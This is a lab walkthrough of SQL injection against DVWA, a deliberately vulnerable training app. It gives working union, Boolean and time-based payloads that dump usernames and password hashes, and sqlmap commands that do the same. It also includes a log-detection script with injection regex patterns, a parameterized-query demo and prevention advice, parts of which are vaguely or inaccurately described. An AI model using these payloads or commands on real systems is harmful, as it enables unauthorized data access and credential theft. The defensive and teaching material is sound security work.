DVWA Walkthrough: SQL Injection

Table of Contents

  • 1. SQL injection
  • 2. Experiment demonstration
    • 2.1. low
    • 2.2. medium
    • 2.3. high
    • 2.4. impossible
  • 3. sqlmap automatic injection
    • 3.1. low
    • 3.2. medium
    • 3.3. high
  • 4. SQL injection (blind injection)
  • 5. Preventive measures

1. SQL injection

SQL is a structured query language for manipulating data in a database; a web application uses it whenever the page's data interacts with the back-end database. SQL injection occurs when the web application does not check the legality of user input, or filters it too loosely. The attacker appends extra SQL to the query statement predefined in the application by modifying the page's URL, form fields or request packets; the modified input is spliced into the SQL statement, passed to the web server and then to the database server, which executes it as a database command without the administrator's knowledge. In this way the attacker tricks the database server into running unauthorized arbitrary queries and can go on to read data, modify data, perform administrator operations, read operating system files, execute operating system commands and so on. The vulnerability lies in the database layer of the application: the database runs the SQL command hidden in the input string as if it were a normal SQL command. For example, if the developer passes user input or cookie data directly to the database without filtering or validation (that is, an injection point exists), the spliced SQL may be executed, leaking database information and escalating privileges; this is a SQL injection attack. SQL injection can be roughly divided into two categories: numeric injection and character (string) injection.
Attack methods:
1. Boolean-based blind injection
The page returns only true or false, so Boolean blind injection infers database information from which of the two responses comes back after injection.
2. Time-based blind injection
When Boolean injection gives no usable result (the page displays normally either way), it is hard to tell whether the injected code ran or whether an injection point exists at all, and Boolean injection cannot help. Time-based blind injection fills this gap: the existence of an injection point is judged from the difference in the page's response time.
3. Union query injection
Union query injection requires that the target page has a display position (echo). It uses UNION to combine the result sets of two or more SELECT statements, so the SELECTs must return the same number of columns with matching data types. The number of columns can be found by appending ORDER BY n to the link (for a guessed n, e.g. order by 9) and judging from the page's response whether that many columns exist.
4. Error-based injection
This method applies when the page has no display position but does echo the database error message (for example via echo mysql_error();). Its advantage is speed; its disadvantages are that the statements are more complicated and that LIMIT must be used to guess the results one at a time. Error-based injection is essentially a formulaic method, used mainly when there is no display position but error messages are echoed.

Injection process:
Step 1: Detect the SQL injection point. This is the critical step. By analysing the application properly it is possible to determine where injection points exist. In general, any dynamic page that accepts submitted input and accesses the database may have a SQL injection vulnerability. If the programmer's security awareness is weak, the database is accessed through dynamically constructed SQL statements, and the validity of user input is not verified, the likelihood of SQL injection is high. Usually the error message on the page is used to determine whether a SQL injection vulnerability exists.
Step 2: Collect information about the back-end database. Different databases have different injection methods and functions, so the database type must be determined before injecting. There are many ways to do this. You can enter special characters such as a single quote, let the program return an error message, and judge from the error text; or you can use a database-specific function, for example entering "1 and version()>0": if the program returns normally, the version() function was recognized and executed, and since version() is MySQL-specific the back-end database can be inferred to be MySQL.
Step 3: Guess the username and password. Table and field names in a database generally follow patterns. By constructing special SQL statements, guess in turn the table names, field names, number of fields, usernames and passwords.
Step 4: Find the web back-end management entry. The back-end management interface is usually not open to ordinary users. To find its login URL, a web directory scanning tool (such as wwwscan or AWVS) can be used to quickly search for possible login addresses, which are then tried one by one.
Step 5: Intrusion and damage. The back-end management account generally has higher privileges and more functions. After logging in to the management platform with the credentials obtained earlier, the attacker can cause arbitrary damage, such as uploading Trojan horses, tampering with web pages, and modifying or stealing information, and can go on to escalate privileges and intrude into the web server and database server.

2. Experiment demonstration

Select SQL Injection in the left-hand menu of the DVWA page.
The goal is to obtain, through SQL injection, the passwords of the users with id 1 to 5 in the database.

2.1. low

DVWA Security is set to Low: no defensive measures are taken and the SQL query uses the raw input.
Enter 2 to view the normal output.

To determine the type of injection point, enter

1' or 1=1#

If this executes normally, the injection point is character (string) type.
Determine the database type by entering

1' union select version(),@@version_compile_os#

If this executes correctly, the version() function was recognized and executed by the database; version() is specific to MariaDB (MySQL), so the back-end database can be inferred to be MySQL, and @@version_compile_os shows that the operating system is Linux.
Guess the database name by entering

1' union select database(),user()#

This returns the database name dvwa.
Next, get the table names. information_schema is a database that ships with MySQL; it stores information about all databases on the MySQL server, such as database names, the tables in each database, and the data types and access permissions of table columns. It contains a table named tables with two fields, table_name and table_schema, which record respectively each table's name and the database that table belongs to.
Enter

1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#

The output shows that the dvwa database has two tables, guestbook and users. Guess that users is the user table.
Get the column names of the users table:

1' union select 1, column_name from information_schema.columns where table_schema='dvwa' and table_name='users' #

Here dvwa and users are the database name and table name found above.

The displayed column names are user_id, first_name, last_name, user, password, avatar, last_login and failed_login. Usernames and passwords can be obtained from the user and password columns.
Get the usernames and passwords by entering

1' union select user, password from users #

The usernames and passwords are returned; the passwords are stored in encrypted (hashed) form, so you can try to reverse them, for example as MD5.

2.2. medium

DVWA Security is set to Medium. The code uses mysql_real_escape_string() to prevent SQL injection; this function escapes the characters \x00, \n, \r, \, ', " and \x1a.
The user id can only be selected from a drop-down list.

Two output fields are displayed. Start Burp to capture the packet.

Send the packet captured by Burp to the Repeater, change id=1 to

id=1 and 3-1 #

and send it.

The normal response shows that this is numeric injection. The rest is the same as the Low-level operation, except that the SQL statement is entered by modifying the id value in Burp, and no single quote is needed. For example, to query the database type, change id=1 to

id=1 union select version(),@@version_compile_os #

2.3. high

DVWA Security is set to High. This is very similar to the Low level, but this time the attacker enters the value differently: the input is passed to the vulnerable query via a session variable set on another page, rather than directly via a GET request.
First click "Click here to change your ID" on the first page, then enter the id to be queried on the page that appears.

Enter on the page

1' and 1=1 #

The page displays normally, so this is character type injection. The rest is the same as the Low level, with the result shown on the page displayed after the injection input is submitted. For example, entering

1' union select user, password from users #

directly obtains the account names and passwords.

2.4. impossible

DVWA Security is set to Impossible. Queries are now parameterized (prepared) rather than built dynamically, which means the query structure is defined by the developer and the database distinguishes which parts are code and which are data. This level is currently not exploitable.

3. sqlmap automatic injection

sqlmap is an automated SQL injection tool. Its main function is to scan for, discover and exploit SQL injection vulnerabilities in a given URL, and it has many built-in bypass (tamper) plug-ins. Supported databases include MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB.

3.1. low

Start Burp packet capture.

The cookie is taken from the request captured by Burp.
Open a terminal in Kali and run

sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=rcs60b05f67h1qk27rm2tn1l8f; security=low"

The URL is copied from the browser after entering 1, and the cookie is extracted from the captured packet.
Answer y to each prompt. The output shows that an injection point exists.

Add --dbs to the above command to list all database names; --batch answers y to every prompt by default. Run in the Kali terminal

sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=rcs60b05f67h1qk27rm2tn1l8f; security=low" --dbs --batch

This lists the existing databases: dvwa and information_schema.
Add --current-db to the command to get the name of the current database. Run

sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=rcs60b05f67h1qk27rm2tn1l8f; security=low" --current-db --batch

The current database is dvwa.
Add -D dvwa --tables to the command to get the table names in the dvwa database.

sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=rcs60b05f67h1qk27rm2tn1l8f; security=low" -D dvwa --tables --batch

This returns the tables guestbook and users in the dvwa database.
Add -T users --columns to the command to get the column names in the users table.

sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=rcs60b05f67h1qk27rm2tn1l8f; security=low" -D dvwa -T users --columns --batch

The column names are obtained successfully. Adding -C user,password,user_id --dump displays the user id, name and password for each row; sqlmap offers to crack the password hashes automatically (a dictionary attack) and saves the results to a local file. Cracking takes some time.

sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=rcs60b05f67h1qk27rm2tn1l8f; security=low" -D dvwa -T users -C user,password,user_id --dump

3.2. medium

Start Burp packet capture.

Copy the captured request into a new file, 1.txt.
Run in Kali

sqlmap -r "1.txt" --batch

The next steps are the same as low.

3.3. high

The injection point is on the second page, i.e. this is the cross-page case.

Start Burp to capture the packet and put its content into a newly created file, 2.txt. Note that the packet to capture is the one sent after clicking Submit on the second page.

Run in Kali

sqlmap -r "2.txt" --batch --second-url "http://127.0.0.1/DVWA/vulnerabilities/sqli/"

The URL given to --second-url is the link to the first page (the one that displays the query result).

The rest is the same as the Low level; for example, run the following command to get the database names

sqlmap -r "2.txt" --batch --second-url "http://127.0.0.1/DVWA/vulnerabilities/sqli/session-input.php" --dbs

4. SQL injection (blind injection)

The difference between SQL blind injection and ordinary injection is that in ordinary injection the attacker can see the execution result of the injected statement directly on the page, whereas in blind injection the attacker usually cannot read the result from the page and may not even know whether the injected statement was executed.
Blind injection is like chatting with a robot that can only answer "yes" or "no" (or whose answer can only be judged from how long it takes to respond). So you start by asking yes/no questions over a wide range, gradually narrow the range, and end with questions like "Is the first character of the database name 'a'?" Through this mechanical questioning the desired data is finally recovered.
There are three types of blind injection:
1) Boolean blind injection: success or failure is shown by a Boolean value (two different page states);
2) Error-based blind injection: the page displays the database error message;
3) Time-based blind injection: the page has no echo position (so union injection cannot be used), does not display the database error message (so error-based injection cannot be used), and responds with the same result whether the query succeeds or fails (so Boolean blind injection cannot be used); time blind injection is used in this case. Time blind injection, also called delayed injection, judges whether an injection point exists from the response time of the page.
The premise for time blind injection is that the page has no display position and outputs no SQL error message, so the pages returned for a correct and an incorrect SQL statement are identical; but after adding a sleep(5) condition, if the page is delayed by more than 5 seconds, the condition holds, i.e. an injection point exists.
General steps for blind injection:
1) Determine whether an injection point exists and whether it is character or numeric type
2) Guess the current database name
3) Guess the table names in the database
4) Guess the field names in the table
5) Guess the data

The goal is to get the version of the SQL database software.
Low level
The Low-level code does not check or filter the parameter id, so there is an obvious SQL injection vulnerability. At the same time, the SQL query returns only two kinds of result (the record exists or it does not).

Based on the returned data, Boolean blind injection can be performed:
1) Before reading the database name, first determine its length:
Enter 1' and length(database())=x #, where x is an integer greater than or equal to 1; when the page shows that the record exists, x is the length of the database name. It is shown for x=4, so the database used by the current page has a name of length 4.
1' and length(database())=1 #

1' and length(database())=4 #

Having determined the length of the database name, guess the characters one at a time starting from the first.
Enter 1' and ascii(substr(database(),1,1)) > x # with a guessed x, for example
1' and ascii(substr(database(),1,1)) > 97 #

The record is shown to exist, indicating that the ASCII value of the first character of the database name is greater than 97 (lowercase a).
Enter
1' and ascii(substr(database(),1,1)) < 122 #

The record is shown to exist, indicating that the ASCII value of the first character of the database name is less than 122 (lowercase z).
Repeat the above steps, narrowing the range by binary search, to recover the complete database name dvwa. It is recommended to implement the above process in code or to use sqlmap.

Time blind injection
Enter
1 and sleep(5) #

The response is not delayed, indicating an execution error: sleep(5) was not executed, so this is not numeric injection.

Enter
1' and sleep(5) #

The response is delayed, indicating that execution succeeded: sleep(5) was executed, so this is character injection.
The following steps are the same as for Boolean injection.
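From the defender's side, every probe shown in this section leaves a distinctive trace in the web server log. The script below is an added example, not part of the original walkthrough: it decodes the query string of constructed Apache-style log lines, flags the union, information_schema, Boolean and sleep() patterns used above, and counts flagged requests per client, since blind injection shows up as many near-identical probes from one address.

```python
"""Flag requests carrying the SQL injection probes from this walkthrough.
Added example; the log lines below are constructed, not captured."""
import re
from urllib.parse import parse_qsl

# Patterns drawn from the payloads used in the walkthrough.
SQLI_PATTERNS = {
    "union_select":  re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_lookup": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "boolean_probe": re.compile(r"\b(and|or)\s+(\d+\s*=\s*\d+|length\(|ascii\(substr\()", re.I),
    "time_probe":    re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "comment_tail":  re.compile(r"(#|--|/\*)\s*$"),
}

# Apache combined-format prefix: client, identity, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample: one benign visitor (10.0.0.5, 10.0.0.7) and one client
# (10.0.0.9) replaying the Low-level and blind probes from the text, URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1532
10.0.0.9 - - [12/Mar/2024:10:01:10 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1%27+or+1%3D1%23&Submit=Submit HTTP/1.1" 200 2210
10.0.0.9 - - [12/Mar/2024:10:01:15 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1%27+union+select+table_name%2Ctable_schema+from+information_schema.tables+where+table_schema%3D+%27dvwa%27%23&Submit=Submit HTTP/1.1" 200 1760
10.0.0.9 - - [12/Mar/2024:10:01:21 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29+%3E+97+%23&Submit=Submit HTTP/1.1" 200 1532
10.0.0.9 - - [12/Mar/2024:10:01:27 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1%27+and+sleep%285%29+%23&Submit=Submit HTTP/1.1" 200 1532
10.0.0.7 - - [12/Mar/2024:10:02:00 +0000] "GET /DVWA/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 1530
"""

def classify_request(path):
    """Return the sorted names of patterns matched by any decoded query parameter value."""
    if "?" not in path:
        return []
    query = path.split("?", 1)[1]
    hits = set()
    for _name, value in parse_qsl(query, keep_blank_values=True):  # decodes %xx and '+'
        for pname, rx in SQLI_PATTERNS.items():
            if rx.search(value):
                hits.add(pname)
    return sorted(hits)

def scan_log(text):
    """Return [(ip, path, hits)] for every request whose parameters look like a probe."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m.group("path"))
        if hits:
            findings.append((m.group("ip"), m.group("path"), hits))
    return findings

def probes_per_source(findings):
    """Count flagged requests per client address."""
    counts = {}
    for ip, _path, _hits in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts

if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(ip, hits, path)
    print(probes_per_source(scan_log(SAMPLE_LOG)))
```

Blind injection through sqlmap produces hundreds of such probes in seconds, so the per-source count is the signal to alert on, not any single request.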

5. Preventive measures

SQL injection attacks are very harmful, and firewalls have difficulty intercepting them. The main methods of preventing SQL injection attacks include the following.
1. Hierarchical permission management
Manage users at different levels and strictly control their permissions. Ordinary users must not be granted permissions such as creating, deleting or modifying databases; only the system administrator has the authority to add, delete, modify and query. With permissions restricted by design, even if a malicious attacker embeds attack code in submitted data, the code cannot be executed because of the permission settings, which reduces the threat SQL injection poses to the database.
2. Parameter passing
When writing SQL, programmers must never write variables directly into SQL statements; related variables must be passed through corresponding parameters, which suppresses SQL injection. Input data must not be embedded directly in a query statement. At the same time the input must be filtered so that unsafe data is removed, or input variables must be passed by value as parameters. This prevents SQL injection attacks to the greatest extent.
3. Basic filtering and secondary filtering
Before a SQL injection attack, the intruder submits special characters such as "and" by modifying parameters to determine whether a vulnerability exists, and then builds SQL injection statements from keywords such as select and update. So to prevent SQL injection, user input must be checked to ensure that the data entered is safe. When checking input or submitted variables, convert or filter characters such as single quotes, double quotes and colons; this effectively prevents SQL injection. Of course there are many dangerous characters. When obtaining parameters submitted by the user, basic filtering must be performed first, followed by secondary filtering according to the program's function and the possible user inputs, to ensure the security of the system.
4. Use security parameters
To effectively suppress the impact of SQL injection attacks, special SQL security parameters were built into the SQL Server database design. When programming, use these security parameters wherever possible to prevent injection attacks and ensure the security of the system. SQL Server provides the Parameters collection, whose role in the database is to perform type checking and length validation on data. When the programmer uses the Parameters collection in the program design, the system automatically filters out executable code in the user input and treats it as a character value. If the user input contains malicious code, the database can also filter it out during inspection. The Parameters collection can also perform mandatory checks: once a checked value is out of range, the system raises an exception and at the same time sends the information to the system administrator, so that the administrator can take corresponding preventive measures.
5. Multi-layer verification
Today's website systems are becoming more and more complex. To ensure the security of the system, a visitor's input must be strictly verified before it enters the system; input that fails verification is refused access to the database outright, and an error message is sent to the upper-level system. At the same time, the visitor's input is verified in the client-side program, which prevents simple SQL injection more effectively. But if a lower layer in the multi-layer verification passes data through on trust, an attacker who bypasses the client can access the system at will. Therefore, when performing multi-layer verification, each layer needs to cooperate with the others; only when effective verification is carried out on both the client side and the system side can SQL injection attacks be better prevented.
6. Database information encryption
The database information is encrypted so that even if an attacker gets into the database, the content cannot be understood.
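The Impossible level in section 2.4 and measure 2 above (parameter passing) come down to the same change, so one added example serves both. It is not DVWA's PHP code: it models the Low-level query, which splices the id into the SQL text, beside the Impossible-level query, which checks that the id is numeric and binds it as a parameter, on an in-memory SQLite copy of a users table with constructed rows. SQLite takes `--` as the comment marker where the MySQL payloads above use `#`, so the payloads are replayed with `-- `.

```python
"""Low-level spliced query versus Impossible-level parameterized query.
Added example on SQLite; the users rows are constructed sample data."""
import sqlite3

def make_db():
    """In-memory users table shaped like DVWA's (constructed rows, constructed hashes)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (
            user_id INTEGER, first_name TEXT, last_name TEXT, user TEXT, password TEXT);
        INSERT INTO users VALUES
            (1, 'admin',  'admin', 'admin',   'constructed_hash_1'),
            (2, 'Gordon', 'Brown', 'gordonb', 'constructed_hash_2');
    """)
    return con

def low_lookup(con, user_id):
    """Low level: the raw id is spliced into the SQL text, so input becomes code."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()

def impossible_lookup(con, user_id):
    """Impossible level: numeric check, bound parameter, and exactly one row expected.
    The value is passed as data; the database never parses it as SQL."""
    if not str(user_id).isdigit():
        return []
    rows = con.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (int(user_id),)
    ).fetchall()
    return rows if len(rows) == 1 else []

if __name__ == "__main__":
    db = make_db()
    for payload in ("1", "1' or 1=1 -- ", "1' union select user, password from users -- "):
        print(repr(payload))
        print("  low:       ", low_lookup(db, payload))
        print("  impossible:", impossible_lookup(db, payload))
```

Run it and the union payload returns the user and password columns through the Low-level query, while the Impossible-level query returns nothing for anything that is not a plain integer.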